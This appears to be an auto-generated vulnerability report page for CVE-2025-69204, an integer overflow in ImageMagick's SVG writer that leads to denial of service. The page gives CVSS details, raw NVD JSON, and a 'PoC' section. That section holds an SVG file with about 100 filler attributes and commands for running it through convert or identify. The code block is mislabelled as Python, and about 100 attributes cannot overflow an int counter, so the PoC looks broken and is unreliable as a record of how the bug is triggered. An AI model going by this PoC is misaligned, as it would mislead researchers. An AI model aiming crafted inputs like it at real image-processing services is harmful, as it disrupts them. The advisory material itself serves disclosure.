Security Vulnerability Report
中文
CVE-2025-69204 CVSS 5.3 MEDIUM

CVE-2025-69204

Published: 2025-12-30 17:15:44
Last Modified: 2026-01-06 18:07:42
Source: [email protected]

Description

ImageMagick is free and open-source software used for editing and manipulating digital images. Prior to version 7.1.2-12, in the WriteSVGImage function, using an int variable to store number_attributes caused an integer overflow. This, in turn, triggered a buffer overflow and caused a DoS attack. Version 7.1.2-12 fixes the issue.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

Configurations (Affected Products)

cpe:2.3:a:imagemagick:imagemagick:*:*:*:*:*:*:*:* - VULNERABLE
ImageMagick < 7.1.2-12

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<?xml version="1.0" encoding="UTF-8"?> <svg xmlns="http://www.w3.org/2000/svg" width="100" height="100"> <!-- PoC for CVE-2025-69204: ImageMagick WriteSVGImage Integer Overflow --> <!-- Generate SVG with excessive attributes to trigger integer overflow in number_attributes --> <rect fill="red" stroke="blue" stroke-width="2" opacity="0.8" style="display:block" class="test" id="element1" data-test="value" attr1="val1" attr2="val2" attr3="val3" attr4="val4" attr5="val5" attr6="val6" attr7="val7" attr8="val8" attr9="val9" attr10="val10" attr11="val11" attr12="val12" attr13="val13" attr14="val14" attr15="val15" attr16="val16" attr17="val17" attr18="val18" attr19="val19" attr20="val20" attr21="val21" attr22="val22" attr23="val23" attr24="val24" attr25="val25" attr26="val26" attr27="val27" attr28="val28" attr29="val29" attr30="val30" attr31="val31" attr32="val32" attr33="val33" attr34="val34" attr35="val35" attr36="val36" attr37="val37" attr38="val38" attr39="val39" attr40="val40" attr41="val41" attr42="val42" attr43="val43" attr44="val44" attr45="val45" attr46="val46" attr47="val47" attr48="val48" attr49="val49" attr50="val50" attr51="val51" attr52="val52" attr53="val53" attr54="val54" attr55="val55" attr56="val56" attr57="val57" attr58="val58" attr59="val59" attr60="val60" attr61="val61" attr62="val62" attr63="val63" attr64="val64" attr65="val65" attr66="val66" attr67="val67" attr68="val68" attr69="val69" attr70="val70" attr71="val71" attr72="val72" attr73="val73" attr74="val74" attr75="val75" attr76="val76" attr77="val77" attr78="val78" attr79="val79" attr80="val80" attr81="val81" attr82="val82" attr83="val83" attr84="val84" attr85="val85" attr86="val86" attr87="val87" attr88="val88" attr89="val89" attr90="val90" attr91="val91" attr92="val92" attr93="val93" attr94="val94" attr95="val95" attr96="val96" attr97="val97" attr98="val98" attr99="val99" attr100="val100" x="0" y="0" width="100" height="100" /> </svg> <!-- Usage: convert poc.svg poc.png or identify poc.svg -->

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-69204", "sourceIdentifier": "[email protected]", "published": "2025-12-30T17:15:43.920", "lastModified": "2026-01-06T18:07:41.727", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "ImageMagick is free and open-source software used for editing and manipulating digital images. Prior to version 7.1.2-12, in the WriteSVGImage function, using an int variable to store number_attributes caused an integer overflow. This, in turn, triggered a buffer overflow and caused a DoS attack. Version 7.1.2-12 fixes the issue."}, {"lang": "es", "value": "ImageMagick es un software libre y de código abierto utilizado para editar y manipular imágenes digitales. Antes de la versión 7.1.2-12, en la función WriteSVGImage, el uso de una variable int para almacenar number_attributes causó un desbordamiento de entero. Esto, a su vez, desencadenó un desbordamiento de búfer y causó un ataque DoS. La versión 7.1.2-12 corrige el problema."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-190"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:imagemagick:imagemagick:*:*:*:*:*:*:*:*", "versionEndExcluding": "7.1.2-12", "matchCriteriaId": "316134FB-09AF-4983-8BCC-E391E2C259E2"}]}]}], "references": [{"url": "https://github.com/ImageMagick/ImageMagick/commit/2c08c2311693759153c9aa99a6b2dcb5f985681e", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-hrh7-j8q2-4qcw", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.